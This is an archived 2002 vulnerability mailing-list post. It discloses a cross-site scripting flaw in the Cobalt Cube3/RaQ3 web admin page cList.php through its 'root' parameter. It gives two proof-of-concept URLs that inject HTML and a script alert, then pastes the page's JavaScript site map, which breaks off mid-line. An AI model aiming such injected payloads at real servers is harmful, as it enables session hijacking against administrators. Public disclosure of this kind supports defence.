Vulnerability Development mailing list archives
Cobalt cube3 css
From: KF <dotslash () snosoft com>
Date: Fri, 01 Mar 2002 14:49:55 -0500
Alex Hernandez just did a great write up on Cobalt cube 4's I took a few minutes to check my cube 3 out a bit I ended up finding a css issue as well. Below is the info from my 2 second audit.
<mailto:al3xhernandez () ureach com>
Try either of the following URLs against your RAQ3 http://host/nav/cList.php?root=</script><h1>www.snosoft.com rocks</h1> http://host/nav/cList.php?root=</script><script>alert('Snosoft Rocks')/<script> You will see your code followed by this chunk of java code that was trying to run. "; // get tab configuration from parameter var isTabbed = true; if("" == "false") isTabbed = false; // build site map siteMap = new Object(); top.siteMap = siteMap; siteMap.documentation = new top.code.mItem_Item("documentation", "User Manuals", "Browse the Cobalt server documentation.", "", "/base/documentation/viewManual.php", false, true, ""); siteMap.documentation_folder = new top.code.mItem_Item("documentation_folder", "Documentation", "On-line product manuals and documentation.", "", "", false, true, ""); siteMap.documentation_logout = new top.code.mItem_Item("documentation_logout", "Close", "Click to close the documentation browser", "logout", "/base/documentation/logout.php", false, true, ""); siteMap.documentation_root = new top.code.mItem_Item("documentation_root", "", "", "", "", false, true, ""); siteMap.base_manual = new top.code.mItem_Item("base_manual", "View Documentation", "Click here to view documentation. ", "", "javascript: open(\047/base/documentation/viewManual.php?\047); top.code.cList_repaint(1);", false, true, ""); siteMap.base_manualButton = new top.code.mItem_Item("base_manualButton", "View Documentation", "Click here to view on-line product manuals and documentation.", "manualOff", "javascript: open(\047/nav/cList.php?root=documentation_root\047); top.code.tab_repaint();", false, true, ""); siteMap.base_cacheACL = new top.code.mItem_Item("base_cacheACL", "Restricted Access", "Web access can be controlled here if this server is being used as a gateway or proxy.", "", "/base/cacheACL/acl.php", false, true, ""); siteMap.base_cache = new top.code.mItem_Item("base_cache", "Web Caching", "Web Caching Settings can be changed here.", "", "/base/cache/cache.php", false, true, ""); siteMap.base_disk_usage = new top.code.mItem_Item("base_disk_usage", "Disk", "Disk usage statistics can be viewed here.", "", "/base/quotastats/diskusage.php", false, true, ""); siteMap.base_webstats = new top.code.mItem_Item("base_webstats", "Web", "Web server usage statistics can be found here.", "", "/base/webstats/webtotals.php", false, true, ""); siteMap.base_amSettings = new top.code.mItem_Item("base_amSettings", "Settings", "Active Monitor Settings can be configured here.", "", "/base/am/amSettings.php", false, true, ""); siteMap.base_amStatus = new top.code.mItem_Item("base_amStatus", "Status", "Active Monitor status information can be viewed here.", "", "/base/am/amStatus.php", false, true, ""); siteMap.base_monitor = new top.code.mItem_Item("base_monitor", "Active Monitor", "System components can be checked for correct operation here.", "", "", false, true, ""); siteMap.base_monitorLight = new top.code.mItem_Item("base_monitorLight", "Active Monitor", "Click here to view Active Monitor status information. This icon turns red if any of the components monitored by Active Monitor have severe problems.", "monitorOff", "javascript: top.code.tab_selectPath(\047base_amStatus\047); top.code.cList_selectPath(\047base_amStatus\047)", false, true, ""); siteMap.base_backup = new top.code.mItem_Item("base_backup", "Backup", "Backups can be scheduled and viewed here.", "", "/base/backup/scheduleList.php", false, true, ""); siteMap.base_restore = new top.code.mItem_Item("base_restore", "Restore", "Restores can be selected and activated here.", "", "/base/backup/restoreList.php", false, true, ""); siteMap.webmail_compose = new top.code.mItem_Item("webmail_compose", "Compose", "Click here to compose a new email message.", "", "/base/webmail/compose.php", false, true, ""); siteMap.webmail = -KF
Current thread:
- Cobalt cube3 css KF (Mar 04)